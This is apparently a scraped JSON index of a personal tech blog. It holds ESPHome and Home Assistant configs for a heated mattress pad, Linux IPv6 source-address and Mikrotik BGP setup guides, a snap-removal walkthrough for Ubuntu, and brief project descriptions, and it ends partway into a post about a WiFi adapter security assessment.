entity_category: config icon: mdi:thermometer lambda: |- return std::stoi(id(master_level_int).state.substr(6)); set_action: then: - select.set: id: master_level_int option: !lambda return \u0026#34;Level \u0026#34; + std::to_string(int(x)); select: - platform: \u0026#34;tuya\u0026#34; entity_category: config id: master_level_int enum_datapoint: 4 internal: true options: 0: \u0026#34;Level 1\u0026#34; # L 1: \u0026#34;Level 2\u0026#34; 2: \u0026#34;Level 3\u0026#34; 3: \u0026#34;Level 4\u0026#34; 4: \u0026#34;Level 5\u0026#34; 5: \u0026#34;Level 6\u0026#34; 6: \u0026#34;Level 7\u0026#34; 7: \u0026#34;Level 8\u0026#34; 8: \u0026#34;Level 9\u0026#34; 9: \u0026#34;Level 10\u0026#34; # H on_value: then: - component.update: master_level - platform: \u0026#34;tuya\u0026#34; entity_category: config id: side_a_level_int enum_datapoint: 20 internal: true options: 0: \u0026#34;Level 1\u0026#34; # L 1: \u0026#34;Level 2\u0026#34; 2: \u0026#34;Level 3\u0026#34; 3: \u0026#34;Level 4\u0026#34; 4: \u0026#34;Level 5\u0026#34; 5: \u0026#34;Level 6\u0026#34; 6: \u0026#34;Level 7\u0026#34; 7: \u0026#34;Level 8\u0026#34; 8: \u0026#34;Level 9\u0026#34; 9: \u0026#34;Level 10\u0026#34; # H on_value: then: - component.update: side_a_level - platform: \u0026#34;tuya\u0026#34; entity_category: config id: side_b_level_int internal: true enum_datapoint: 21 options: 0: \u0026#34;Level 1\u0026#34; # L 1: \u0026#34;Level 2\u0026#34; 2: \u0026#34;Level 3\u0026#34; 3: \u0026#34;Level 4\u0026#34; 4: \u0026#34;Level 5\u0026#34; 5: \u0026#34;Level 6\u0026#34; 6: \u0026#34;Level 7\u0026#34; 7: \u0026#34;Level 8\u0026#34; 8: \u0026#34;Level 9\u0026#34; 9: \u0026#34;Level 10\u0026#34; # H on_value: then: - component.update: side_b_level - platform: \u0026#34;tuya\u0026#34; entity_category: config name: \u0026#34;Side A Set Timer\u0026#34; enum_datapoint: 26 icon: mdi:timer options: 0: 0.5 hours 1: 1 hour 2: 1.5 hours 3: 2 hours 4: 2.5 hours 5: 3 hours 6: 3.5 hours 7: 4 hours 8: 4.5 hours 9: 5 hours 10: 5.5 hours 11: 6 hours 12: 6.5 hours 13: 7 hours 14: 7.5 hours 15: 8 hours 16: 8.5 hours 17: 9 hours 18: 9.5 hours 19: 10 hours 20: 24 hours - platform: \u0026#34;tuya\u0026#34; entity_category: config name: \u0026#34;Side B Set Timer\u0026#34; enum_datapoint: 27 icon: mdi:timer options: 0: 0.5 hours 1: 1 hour 2: 1.5 hours 3: 2 hours 4: 2.5 hours 5: 3 hours 6: 3.5 hours 7: 4 hours 8: 4.5 hours 9: 5 hours 10: 5.5 hours 11: 6 hours 12: 6.5 hours 13: 7 hours 14: 7.5 hours 15: 8 hours 16: 8.5 hours 17: 9 hours 18: 9.5 hours 19: 10 hours 20: 24 hours text_sensor: # version sensor - platform: version name: Firmware Version hide_timestamp: False id: version_txt # wifi info - platform: wifi_info ip_address: name: IP Address entity_category: diagnostic mac_address: name: MAC Address entity_category: diagnostic button: - platform: restart name: Restart id: restart_btn Home Assistant Dashboard I’ve made a Home Assistant dashboard for controlling the bed as well\ntype: custom:vertical-stack-in-card cards: - type: conditional conditions: - entity: switch.mattress_master_power state: \u0026#34;on\u0026#34; card: type: button show_name: true show_icon: true entity: switch.mattress_master_power icon: mdi:car-seat-heater show_state: true name: Bed Power - type: conditional conditions: - entity: switch.mattress_master_power state_not: \u0026#34;on\u0026#34; card: type: button show_name: true show_icon: true tap_action: action: call-service service: script.warm_bed service_data: {} target: {} icon: mdi:car-seat-heater show_state: true name: Preheat Bed - type: custom:collapsable-cards title: Details cards: - type: entities entities: - entity: switch.mattress_master_power name: Power icon: mdi:radiator - entity: number.mattress_master_heat_level name: Level - entity: switch.mattress_master_preheat_power name: Preheat icon: mdi:fire state_color: true show_header_toggle: false - type: custom:vertical-stack-in-card horizontal: true cards: - type: entities entities: - entity: switch.mattress_side_a_power name: A icon: mdi:radiator secondary_info: none - entity: number.mattress_side_a_level name: Level - entity: switch.mattress_side_a_preheat name: Preheat icon: mdi:fire - entity: select.mattress_side_a_set_timer name: Timer icon: mdi:clock-edit show_header_toggle: false state_color: true - type: entities entities: - entity: switch.mattress_side_b_power name: B icon: mdi:radiator secondary_info: none - entity: number.mattress_side_b_level name: Level - entity: switch.mattress_side_b_preheat name: Preheat icon: mdi:fire - entity: select.mattress_side_b_set_timer name: Timer icon: mdi:clock-edit show_header_toggle: false state_color: true ","permalink":"https://lanrat.com/posts/esphome-tuya-mattress-pad/","summary":"\u003cp\u003eThis post outlines the process to replace a \u003ca href=\"https://developer.tuya.com/en/docs/iot/wifi-module?id=Kaiuyi301kmk4\"\u003eTuya radio module\u003c/a\u003e with one running \u003ca href=\"https://esphome.io/\"\u003eESPHome\u003c/a\u003e to fully control a heated mattress pad locally with Home Assistant.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Sunbeam Heated Mattress Pad\" loading=\"lazy\" src=\"/posts/esphome-tuya-mattress-pad/images/sunbeam-heated-mattress-pad.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eI purchased a \u003ca href=\"https://newellbrands.imgix.net/a9b10c44-e47f-3a72-b900-8cbc5bb36c2f/a9b10c44-e47f-3a72-b900-8cbc5bb36c2f.pdf\"\u003eSunbeam Heated Mattress Pad\u003c/a\u003e for those cold winter nights. The mattress pad controller connects to WiFi and has a remote control app. However, it has a safety feature that limits functionality. The app can only adjust heat levels and turn the pad off unless you\u0026rsquo;ve recently pressed a physical button on the controller, effectively limiting the app to changing heat levels and turning the device off.\u003c/p\u003e","title":"Converting Sunbeam Heated Mattress Pad to ESPHome"},{"content":"GPM2Spotify History converts Google Play Music listening history data to Spotify-compatible JSON format. The Python scripts process HTML activity files exported from Google Play Music and generate structured JSON data that can be used with modern music tracking and analysis tools.\nThe conversion tool helps users migrate their historical listening data from the discontinued Google Play Music service to formats compatible with current music platforms and personal analytics tools. It parses activity HTML exports and transforms the data into standardized JSON structures for further processing.\n","permalink":"https://lanrat.com/projects/gpm2spotify-history/","summary":"\u003cp\u003eGPM2Spotify History converts Google Play Music listening history data to Spotify-compatible JSON format. The Python scripts process HTML activity files exported from Google Play Music and generate structured JSON data that can be used with modern music tracking and analysis tools.\u003c/p\u003e\n\u003cp\u003eThe conversion tool helps users migrate their historical listening data from the discontinued Google Play Music service to formats compatible with current music platforms and personal analytics tools. It parses activity HTML exports and transforms the data into standardized JSON structures for further processing.\u003c/p\u003e","title":"GPM2Spotify History"},{"content":"When creating a socket unless manually specified, the OS will automatically determine the source address to use. However, the OS\u0026rsquo;s default choice may not always be desired. Source Address Selection allows for influencing the sources address chosen by the OS.\nWhat is Source Address Selection? When a host with multiple routable IP addresses sends a packet to another host, it needs to determine which of its local addresses to use as the source “from” address.\nHosts having multiple routable local addresses was not very common with IPv4, but it is becoming increasingly more common with IPv6. Especially if there are multiple Router-Advertised subnets and SLAAC addresses bound to the same host, either on the same interface or different interfaces.\nRFC 6724 Rules Unless manually specified, the source address for a packet is determined by the host’s OS. The method for determining a source address is outlined in RFC 6724 and should be consistent across all platforms.\nBelow are the rules outlined in RFC 6724. The specifics of each rule are beyond the scope of this post. See the RFC for more details. Suffice to say the defaults are good (ex: respond to traffic with the same IP it was sent to) but there are cases there you will want to override the defaults.\nPrefer same address. Prefer appropriate scope. Avoid deprecated addresses. Prefer home addresses. Prefer outgoing interface. Prefer matching label. Prefer privacy addresses. Use longest matching prefix. Why Override Source Address Selection? Why is this important if the routing table is correct and the defaults work?\nHere are a few examples:\nIf a host has multiple routable IP addresses, and sends traffic to another host behind a firewall that only allows one source address through. The default source address selection should be overridden to ensure all traffic destined to the firewalled host uses the correct source address to ensure it is not blocked. If a host is on multiple networks, or dual-homed such as a router, with a statically routed IP or subnet, the host will ensure that any traffic destined to or from the statically routed IP/subnet uses the correct interface. Ex: You have a server with multiple uplinks and two IP addresses. Your primary dynamically routed address is 5.5.5.5 and is routable from every interface and secondary address is in the statically routed subnet 3.3.3.1/24 routable from only a single uplink. If the default source address selection outlined in RFC 6724 decides to use 3.3.3.1/24 as the default source address, your outgoing traffic may be sent from the statically routed source address to a peer/gateway that only accepts the dynamically routed address. This packet would likely be dropped on a well configured network that implemented BCP38 route filtering. Overriding source address selection in Linux Rule 6 “Prefer matching label” from the above routing source address selection rules can be influenced by custom IP address labels table. By adding to this table it is possible to influence the source address selection used.\nThe address label tables works as a simple lookup table. For each new outgoing connection the IP address label table is searched for the destination address to find a matching label. If there are multiple matches, the most specific match is used. Once found, the same table is then searched for all possible source addresses with a matching label. If one is found, that address is used as the source address.\nThe label values are numeric, but they have no ranking or purpose other than being a unique value to compare to other labels for equality. A label of 27 is not any more or less significant than a label of 42.\nTo view the current source address selection table, run: ip addrlabel list.\nExample:\n$ ip addrlabel list prefix ::1/128 label 0 prefix ::/96 label 3 prefix ::ffff:0.0.0.0/96 label 4 prefix 2001::/32 label 6 prefix 2001:10::/28 label 7 prefix 3ffe::/16 label 12 prefix 2002::/16 label 2 prefix fec0::/10 label 11 prefix fc00::/7 label 5 prefix ::/0 label 1 A new address label can be added to the table with:\nip addrlabel add prefix $PREFIX dev $IFACE label $LABEL The dev $IFACE portion is not required. But it is a good idea to be specific and force the label entry to a particular device.\nExample Lets say you have a host with the IPv6 addresses 2001:0DB8:AAAA::2/64 and 2001:0DB8:BBBB::2/64. All traffic egressing from this host should use the source IP 2001:0DB8:AAAA::2 except traffic destined for anything in the subnet 2001:0DB8:FOO:BAR::/64 which should use 2001:0DB8:BBBB::2. This can be forced by adding the following IP address labels:\n# set the specific case with label 42 ip addrlabel add prefix 2001:0DB8:FOO:BAR::/64 label 42 ip addrlabel add prefix 2001:0DB8:BBBB::2 label 42 # set the default case with label 99 # The following are actually not needed but included for completeness. # the prior rules will take the addresses with label 42 out of # the pool of matching addresses using the default labels. ip addrlabel add prefix ::/0 label 99 ip addrlabel add prefix 2001:0DB8:AAAA::2 label 99 In this example the labels 99 and 42 are used. But they are arbitrary and can be any number not already in use by an existing address label.\nExclude an Address from the List of Possible Defaults to Select Sometimes a system may have multiple addresses, and you may just want to exclude an address from the list of possible defaults from the OS to choose from. For this particular case you only need to add the address to the address list table with a label that is not already in use.\nSince the address will not have any other matching addresses or networks in the table with the same label, it won\u0026rsquo;t match anything, and any other address will take prescience.\nThe following can be used to remove the address 2001:0DB8:BBBB::2 from the host\u0026rsquo;s default address selection if we want all traffic to use another source address (assuming no other rules change this)\nip addrlabel add prefix 2001:0DB8:BBBB::2 label 32 Set Source Address Rules Address Labels at Boot in Debian Once the address labels are added, they will take effect immediately. However they are not persistent and will be lost on reboot. On Debian based systems a post-up hook can be used to add the rule automatically once the parent interface is brought online. Rules associated with an interface are automatically removed when that interface disappears.\nIn /etc/network/interfaces or /etc/network/interfaces.d/INTERFACE_CONFIG if you have a per-interface config, set your ip addrlabel add ... command in the post-up section of the stanza for the desired interface. The variable $IFACE can be used as a placeholder for the current interface name.\nExample:\niface eno1 inet6 static address 2001:0DB8:AAAA::2/64 gateway 2001:0DB8:AAAA::1 iface eno1 inet6 static address 2001:0DB8:BBBB::2/64 #set high label (42) to not conflict with existing label post-up ip addrlabel add prefix 2001:0DB8:BBBB::0/64 dev $IFACE label 42 || true post-up ip addrlabel add prefix 2001:0DB8:FOO:BAR::/64 dev $IFACE label 42 || true In this example no address labels are set for the desired default source address 2001:0DB8:AAAA::2. This still works as now the non-default source address has a non-default label, causing it to not be selected for outgoing traffic by default unless another rule matches the address label.\nThe post-up commands end in || true so that they always return with a 0 exit code. If the command was to fail and return a non-zero exit code, the interface may not finish being brought up by the OS. If this is a server, it is far more important for some of the network to be brought online so that it can be accessed (and fixed) remotely in this case instead of taking itself offline. Adding an address label that already exists will cause an error exit code, but since it already exists, its safe to ignore as it already exists.\nMore Information IPv6 Source Address Selection – what, why, how Controlling IPv6 source address selection ip-addrlabel - Linux manual page Address Resolver \u0026amp; Selection ","permalink":"https://lanrat.com/posts/linux-src-ip-selection/","summary":"\u003cp\u003eWhen creating a socket unless manually specified, the OS will automatically determine the source address to use. However, the OS\u0026rsquo;s default choice may not always be desired. Source Address Selection allows for influencing the sources address chosen by the OS.\u003c/p\u003e\n\u003ch2 id=\"what-is-source-address-selection\"\u003eWhat is Source Address Selection?\u003c/h2\u003e\n\u003cp\u003eWhen a host with multiple routable IP addresses sends a packet to another host, it needs to determine which of its local addresses to use as the source “from” address.\u003c/p\u003e","title":"Influencing Linux IP Source Address Selection"},{"content":"Scroller is a web application that displays customizable scrolling text messages in fullscreen mode. The single-page application allows users to configure text content, fonts, colors, scroll speed, and background themes before launching a fullscreen display.\nThe application includes URL hash-based message saving, automatic text scaling to fit screens, and responsive design with light/dark mode support. It\u0026rsquo;s designed for creating dynamic text displays for presentations, signage, or any scenario requiring large-scale scrolling text output.\n","permalink":"https://lanrat.com/projects/scroller/","summary":"\u003cp\u003eScroller is a web application that displays customizable scrolling text messages in fullscreen mode. The single-page application allows users to configure text content, fonts, colors, scroll speed, and background themes before launching a fullscreen display.\u003c/p\u003e\n\u003cp\u003eThe application includes URL hash-based message saving, automatic text scaling to fit screens, and responsive design with light/dark mode support. It\u0026rsquo;s designed for creating dynamic text displays for presentations, signage, or any scenario requiring large-scale scrolling text output.\u003c/p\u003e","title":"Scroller"},{"content":"Caddy Signal Proxy implements a Signal TLS proxy using the Caddy web server and the caddy-l4 plugin. The configuration enables Signal messaging clients to connect through a TLS proxy for improved privacy or to bypass network restrictions.\nThe deployment uses Docker Compose with a minimal configuration that can be integrated into existing Caddy setups. The proxy handles TLS termination and forwarding for Signal\u0026rsquo;s messaging infrastructure, requiring only a domain name configuration to operate.\n","permalink":"https://lanrat.com/projects/caddy-signal-proxy/","summary":"\u003cp\u003eCaddy Signal Proxy implements a Signal TLS proxy using the Caddy web server and the caddy-l4 plugin. The configuration enables Signal messaging clients to connect through a TLS proxy for improved privacy or to bypass network restrictions.\u003c/p\u003e\n\u003cp\u003eThe deployment uses Docker Compose with a minimal configuration that can be integrated into existing Caddy setups. The proxy handles TLS termination and forwarding for Signal\u0026rsquo;s messaging infrastructure, requiring only a domain name configuration to operate.\u003c/p\u003e","title":"Caddy Signal Proxy"},{"content":"When running a network with its own ASN, you will likely end up spending some time working with BGP. Knowing how your peer networks connect can help with your own network planning. BGP.Tools is a service that maps out different networks and the routes between them by having networks opt to provide bgp.tools with a BGP session sharing their exportable routes.\nThis guide will walk you through setting up a BGP.Tools session with a Mikrotik router running RouterOS 7.\nBGP Tools Setup After logging into your BGP.Tools account, visit the manage peering page and create a new session.\nFill in a name for this BGP session, your AS number, your router’s IP.\nSelect “Create Session” and make a note of the remote peering IP and AS number.\nMikrotik RouterOS Setup Route Filters Before creating the session, create route filters to prevent any unexpected routes from being exchanged. BGP.Tools should never send you routes from this session, but its best to explicitly tell your router to reject all incoming routes just to be safe. Similarly, you don’t want to send bgp.tools blackhole routes either.\n/routing filter rule add chain=reject comment=reject disabled=no rule=reject add chain=bgp.tools-out disabled=no rule=\u0026#34;if (blackhole) {reject}\u0026#34; add chain=bgp.tools-out disabled=no rule=accept BGP Session Now you add the BGP session with bgp.tools.\nAt this time Mikrotik’s BGP implementation does not support addPath, so only your router’s currently active routes will be sent to bgp.tools.\nUnlike a normal BGP session, be sure to select both the ip and ipv6 address families, and enable multihop since this BGP session will be over the Internet and not a LAN.\nBe sure to change the examples to use your ASN and IP.\n/routing bgp connection add add-path-out=all address-families=ip,ipv6 as=64496 \\ disabled=no input.affinity=instance .filter=reject \\ local.address=198.51.100.1 .role=ebgp-provider multihop=yes \\ name=bgp.tools output.affinity=input .filter-chain=\\ bgp.tools-out .redistribute=bgp remote.address=\\ 185.230.223.77/32 .as=212232 router-id=198.51.100.1 \\ routing-table=main Save and enable the session once done.\nBGP Tools Results Once the session is enabled and active, you should see it listed on your bgp.tools account home page.\nAnd when you view your AS page you should see Direct Feed added to your ASN’s tags. For example, here is mine.\nNow that you send BGP.Tools a BGP feed, your network’s information will be more accurate and you can use other features such as the Looking Glass!\n","permalink":"https://lanrat.com/posts/mikrotik-bgp-tools/","summary":"\u003cp\u003eWhen running a network with its own ASN, you will likely end up spending some time working with \u003ca href=\"https://en.wikipedia.org/wiki/Border_Gateway_Protocol\"\u003eBGP\u003c/a\u003e. Knowing how your peer networks connect can help with your own network planning. \u003ca href=\"https://bgp.tools\"\u003eBGP.Tools\u003c/a\u003e is a service that maps out different networks and the routes between them by having networks opt to provide bgp.tools with a BGP session sharing their exportable routes.\u003c/p\u003e\n\u003cp\u003eThis guide will walk you through setting up a \u003ca href=\"https://bgp.tools\"\u003eBGP.Tools\u003c/a\u003e session with a Mikrotik router running RouterOS 7.\u003c/p\u003e","title":"Creating a Mikrotik BGP.Tools Session"},{"content":"Portquiz tests outbound TCP and UDP connectivity to remote hosts by attempting connections across specified port ranges. The tool identifies which ports can successfully establish connections through network infrastructure such as firewalls, NAT devices, and proxies.\nThe program can detect deep packet inspection (DPI) filtering and other network-level blocking mechanisms. It supports testing individual ports or scanning complete port ranges, with cross-platform compatibility across Windows, macOS, and Linux systems.\n","permalink":"https://lanrat.com/projects/portquiz/","summary":"\u003cp\u003ePortquiz tests outbound TCP and UDP connectivity to remote hosts by attempting connections across specified port ranges. The tool identifies which ports can successfully establish connections through network infrastructure such as firewalls, NAT devices, and proxies.\u003c/p\u003e\n\u003cp\u003eThe program can detect deep packet inspection (DPI) filtering and other network-level blocking mechanisms. It supports testing individual ports or scanning complete port ranges, with cross-platform compatibility across Windows, macOS, and Linux systems.\u003c/p\u003e","title":"Portquiz"},{"content":"Caddy Dynamic RemoteIP is a Caddy web server module that provides dynamic IP address matching capabilities. The module implements the http.matchers.dynamic_remote_ip matcher, which allows matching requests based on remote IP addresses that are dynamically sourced from configurable modules.\nUnlike static IP matching, this module enables real-time IP range updates through pluggable IPRangeSource implementations. This is useful for scenarios requiring dynamic access control based on changing IP ranges, such as cloud provider IP lists or threat intelligence feeds.\n","permalink":"https://lanrat.com/projects/caddy-dynamic-remoteip/","summary":"\u003cp\u003eCaddy Dynamic RemoteIP is a Caddy web server module that provides dynamic IP address matching capabilities. The module implements the http.matchers.dynamic_remote_ip matcher, which allows matching requests based on remote IP addresses that are dynamically sourced from configurable modules.\u003c/p\u003e\n\u003cp\u003eUnlike static IP matching, this module enables real-time IP range updates through pluggable IPRangeSource implementations. This is useful for scenarios requiring dynamic access control based on changing IP ranges, such as cloud provider IP lists or threat intelligence feeds.\u003c/p\u003e","title":"Caddy Dynamic RemoteIP"},{"content":"TOOR.sh is a cloud and VM hosting service operated by ToorCon, a 501c3 non-profit organization that provides free hosting resources for security research and public benefit projects. The service includes dedicated servers for VMs, storage, and databases, along with their own ISP infrastructure (AS22296).\nThe platform offers various free tools including IP address lookup services, network speed tests, and internet infrastructure services such as RIPE Atlas probes, BGP feeds, Tor nodes, and Signal TLS proxies. TOOR.sh operates on a volunteer basis with a \u0026ldquo;best effort SLA\u0026rdquo; and accepts donations of hardware, network resources, or funds to support their mission.\n","permalink":"https://lanrat.com/projects/toor.sh/","summary":"\u003cp\u003eTOOR.sh is a cloud and VM hosting service operated by ToorCon, a 501c3 non-profit organization that provides free hosting resources for security research and public benefit projects. The service includes dedicated servers for VMs, storage, and databases, along with their own ISP infrastructure (AS22296).\u003c/p\u003e\n\u003cp\u003eThe platform offers various free tools including IP address lookup services, network speed tests, and internet infrastructure services such as RIPE Atlas probes, BGP feeds, Tor nodes, and Signal TLS proxies. TOOR.sh operates on a volunteer basis with a \u0026ldquo;best effort SLA\u0026rdquo; and accepts donations of hardware, network resources, or funds to support their mission.\u003c/p\u003e","title":"TOOR.sh"},{"content":"WebSerial Bruteforce automatically determines the correct baud rate for UART serial devices by testing common communication speeds and analyzing the returned data. The web application uses the WebSerial API to connect directly to serial devices from the browser without requiring additional software.\nThe tool iterates through standard baud rates and measures the amount of ASCII data returned at each setting, selecting the configuration that produces the most readable output. This is useful for reverse engineering or troubleshooting unknown serial devices where the communication parameters are not documented.\n","permalink":"https://lanrat.com/projects/webserial-bruteforce/","summary":"\u003cp\u003eWebSerial Bruteforce automatically determines the correct baud rate for UART serial devices by testing common communication speeds and analyzing the returned data. The web application uses the WebSerial API to connect directly to serial devices from the browser without requiring additional software.\u003c/p\u003e\n\u003cp\u003eThe tool iterates through standard baud rates and measures the amount of ASCII data returned at each setting, selecting the configuration that produces the most readable output. This is useful for reverse engineering or troubleshooting unknown serial devices where the communication parameters are not documented.\u003c/p\u003e","title":"WebSerial Bruteforce"},{"content":"USB Meter is a web application that connects to Atorch power meters via WebBluetooth to log and display electrical measurements. The application reads real-time data including voltage, current, power, energy, capacity, resistance, and temperature from compatible Atorch USB power meters.\nThe web interface provides data logging capabilities with the ability to reset, pause, and save measurement sessions. Using WebBluetooth API, the application eliminates the need for additional software installations, operating directly in compatible web browsers with Bluetooth support.\n","permalink":"https://lanrat.com/projects/usb-meter/","summary":"\u003cp\u003eUSB Meter is a web application that connects to Atorch power meters via WebBluetooth to log and display electrical measurements. The application reads real-time data including voltage, current, power, energy, capacity, resistance, and temperature from compatible Atorch USB power meters.\u003c/p\u003e\n\u003cp\u003eThe web interface provides data logging capabilities with the ability to reset, pause, and save measurement sessions. Using WebBluetooth API, the application eliminates the need for additional software installations, operating directly in compatible web browsers with Bluetooth support.\u003c/p\u003e","title":"USB Meter"},{"content":"An opkg repository that builds Tailscale combined packages for OpenWrt devices, specifically providing a backport of Tailscale for OpenWrt 19.07. The project addresses the lack of official Tailscale packages for older OpenWrt versions by providing a flexible build system that generates installable packages across multiple hardware architectures.\nThe repository includes automated build scripts that create opkg feed and package files, allowing users to easily install and configure Tailscale on their OpenWrt 19.07 devices. This enables secure mesh networking capabilities on legacy router firmware, making it simple to connect older OpenWrt devices to a Tailscale network for remote access and site-to-site connectivity.\n","permalink":"https://lanrat.com/projects/openwrt-tailscale-repository/","summary":"\u003cp\u003eAn opkg repository that builds Tailscale combined packages for OpenWrt devices, specifically providing a backport of Tailscale for OpenWrt 19.07. The project addresses the lack of official Tailscale packages for older OpenWrt versions by providing a flexible build system that generates installable packages across multiple hardware architectures.\u003c/p\u003e\n\u003cp\u003eThe repository includes automated build scripts that create opkg feed and package files, allowing users to easily install and configure Tailscale on their OpenWrt 19.07 devices. This enables secure mesh networking capabilities on legacy router firmware, making it simple to connect older OpenWrt devices to a Tailscale network for remote access and site-to-site connectivity.\u003c/p\u003e","title":"OpenWrt Tailscale Repository"},{"content":"Mag Encode is a web-based magnetic stripe card encoder that generates audio signals for encoding data onto magnetic stripe cards. The application runs entirely in the browser, processing encoding operations client-side without transmitting data to external servers.\nThe tool supports configurable encoding parameters including frequency settings, reverse swipe options, and various advanced configuration options for different magnetic stripe formats. It converts digital data into the appropriate audio waveforms that can be played through audio output devices to magnetically encode stripe cards.\n","permalink":"https://lanrat.com/projects/mag-encode/","summary":"\u003cp\u003eMag Encode is a web-based magnetic stripe card encoder that generates audio signals for encoding data onto magnetic stripe cards. The application runs entirely in the browser, processing encoding operations client-side without transmitting data to external servers.\u003c/p\u003e\n\u003cp\u003eThe tool supports configurable encoding parameters including frequency settings, reverse swipe options, and various advanced configuration options for different magnetic stripe formats. It converts digital data into the appropriate audio waveforms that can be played through audio output devices to magnetically encode stripe cards.\u003c/p\u003e","title":"Mag Encode"},{"content":"Broken DNS performs lame delegation checking at scale to identify DNS nameserver configuration issues. The tool validates DNS delegation by checking if nameservers properly respond to queries for zones they are supposed to be authoritative for.\nThe Go implementation can process large numbers of domains and nameservers to detect misconfigurations where nameservers are listed in delegation records but do not actually serve the zone data. This helps identify broken DNS setups that can cause resolution failures.\n","permalink":"https://lanrat.com/projects/broken-dns/","summary":"\u003cp\u003eBroken DNS performs lame delegation checking at scale to identify DNS nameserver configuration issues. The tool validates DNS delegation by checking if nameservers properly respond to queries for zones they are supposed to be authoritative for.\u003c/p\u003e\n\u003cp\u003eThe Go implementation can process large numbers of domains and nameservers to detect misconfigurations where nameservers are listed in delegation records but do not actually serve the zone data. This helps identify broken DNS setups that can cause resolution failures.\u003c/p\u003e","title":"Broken DNS"},{"content":"Minimalin Reborn is a minimalistic watchface for Pebble smartwatches, featuring a clean design with customizable colors and optional information displays. The watchface uses a custom font called Nupe and provides configurable elements including weather data and step tracking integration.\nThis project is a fork and modernization of the original minimalin watchface, updated to work with current Pebble development tools and the Rebble ecosystem. The watchface supports both color and monochrome Pebble devices with adaptive styling and user-configurable display options.\n","permalink":"https://lanrat.com/projects/minimalin-reborn/","summary":"\u003cp\u003eMinimalin Reborn is a minimalistic watchface for Pebble smartwatches, featuring a clean design with customizable colors and optional information displays. The watchface uses a custom font called Nupe and provides configurable elements including weather data and step tracking integration.\u003c/p\u003e\n\u003cp\u003eThis project is a fork and modernization of the original minimalin watchface, updated to work with current Pebble development tools and the Rebble ecosystem. The watchface supports both color and monochrome Pebble devices with adaptive styling and user-configurable display options.\u003c/p\u003e","title":"Minimalin Reborn"},{"content":"Recent versions of Ubuntu are shipping with Snapcraft by default, and some of the default applications run inside a snap as well. Snaps are application containers, similar to Docker, but designed for desktop applications.\nUnfortunately Canonical seems to be pushing Snaps hard, and they are not always wanted. This is made worse by not providing an easy way to remove the snap functionality for Ubuntu.\nThe commands bellow will entirely remove snap from an Ubuntu installation.\nsudo snap remove snap-store sudo apt remove snapd sudo umount /dev/loop* sudo rm -rf /snap sudo rm -rf /var/snap sudo rm -rf /var/lib/snapd sudo rm -rf /etc/systemd/system/snap* sudo rm -rf /root/snap/ /home/*/snap sudo apt purge snapd echo -e \u0026#39;Package: snapd\\nPin: origin *\\nPin-Priority: -1\u0026#39; | sudo tee /etc/apt/preferences.d/no_snapd reboot Note By default Firefox is installed as a snap and will be removed with the above commands. So if you want to keep Firefox installed (or any other snap program you had previously installed) you will need to re-install it using apt.\nsudo apt install firefox The above commands have been successfully tested and work on Ubuntu 20.04 and 22.04.\n","permalink":"https://lanrat.com/posts/remove-snap-from-ubuntu/","summary":"\u003cp\u003eRecent versions of \u003ca href=\"https://ubuntu.com/\"\u003eUbuntu\u003c/a\u003e are shipping with \u003ca href=\"https://snapcraft.io/\"\u003eSnapcraft\u003c/a\u003e by default, and some of the default applications run inside a snap as well. Snaps are application containers, similar to Docker, but designed for desktop applications.\u003c/p\u003e\n\u003cp\u003eUnfortunately Canonical seems to be pushing Snaps hard, and they are not always wanted. This is made worse by not providing an easy way to remove the snap functionality for Ubuntu.\u003c/p\u003e\n\u003cp\u003eThe commands bellow will entirely remove snap from an Ubuntu installation.\u003c/p\u003e","title":"Remove SNAP from Ubuntu"},{"content":"Homeplate is an ESP32-based e-ink dashboard that displays data from Trmnl and Home Assistant on an Inkplate 10 device. The firmware fetches and renders various dashboard widgets including sensor readings, WiFi QR codes, and system status information.\nThe implementation uses FreeRTOS on ESP32 to manage display updates, network connectivity, and power management for the e-ink display. It supports multiple data sources and configurable display layouts for home automation monitoring.\n","permalink":"https://lanrat.com/projects/homeplate/","summary":"\u003cp\u003eHomeplate is an ESP32-based e-ink dashboard that displays data from Trmnl and Home Assistant on an Inkplate 10 device. The firmware fetches and renders various dashboard widgets including sensor readings, WiFi QR codes, and system status information.\u003c/p\u003e\n\u003cp\u003eThe implementation uses FreeRTOS on ESP32 to manage display updates, network connectivity, and power management for the e-ink display. It supports multiple data sources and configurable display layouts for home automation monitoring.\u003c/p\u003e","title":"Homeplate"},{"content":"ESPHome Components is a collection of custom components that extend ESPHome functionality for ESP8266 and ESP32 microcontrollers. The repository contains C++ implementations of additional sensors, displays, and device integrations not available in the core ESPHome distribution.\nThe components follow ESPHome\u0026rsquo;s standard architecture and configuration patterns, allowing them to be easily integrated into existing ESPHome projects through external component references. Each component includes the necessary C++ code and Python configuration validation.\n","permalink":"https://lanrat.com/projects/esphome-components/","summary":"\u003cp\u003eESPHome Components is a collection of custom components that extend ESPHome functionality for ESP8266 and ESP32 microcontrollers. The repository contains C++ implementations of additional sensors, displays, and device integrations not available in the core ESPHome distribution.\u003c/p\u003e\n\u003cp\u003eThe components follow ESPHome\u0026rsquo;s standard architecture and configuration patterns, allowing them to be easily integrated into existing ESPHome projects through external component references. Each component includes the necessary C++ code and Python configuration validation.\u003c/p\u003e","title":"ESPHome Components"},{"content":"DNS2mDNS bridges traditional DNS queries with multicast DNS (mDNS) resolution for .local hostnames. The service allows devices that don\u0026rsquo;t natively support mDNS, such as many Android devices and Windows systems, to resolve local network hostnames through standard DNS queries.\nThe Go implementation acts as a DNS server that intercepts queries for .local domains and forwards them to the mDNS system, then returns the results via standard DNS responses. This enables seamless local hostname resolution across mixed network environments with Docker deployment support.\n","permalink":"https://lanrat.com/projects/dns2mdns/","summary":"\u003cp\u003eDNS2mDNS bridges traditional DNS queries with multicast DNS (mDNS) resolution for .local hostnames. The service allows devices that don\u0026rsquo;t natively support mDNS, such as many Android devices and Windows systems, to resolve local network hostnames through standard DNS queries.\u003c/p\u003e\n\u003cp\u003eThe Go implementation acts as a DNS server that intercepts queries for .local domains and forwards them to the mDNS system, then returns the results via standard DNS responses. This enables seamless local hostname resolution across mixed network environments with Docker deployment support.\u003c/p\u003e","title":"DNS2mDNS"},{"content":"This post outlines a security assessment of the new Sena Wifi Adapter I performed last summer for fun.\nWith the world on lock-down due to COVID-19, I spent a lot of time last summer escaping the city going on motorcycle rides through the mountains and forests surrounding the bay area. It\u0026rsquo;s the perfect social distance activity because if you get within 6ft of someone you are likely to crash. One of my favorite motorcycle accessories is my Sena headset. It allows me to listen to navigation or music from my phone over Bluetooth while riding, and talk to other riders in my group.\nI was in the market for a new headset and Sena had just released the Sena 50R. It has USB-C, mesh, Bluetooth 5, voice activated 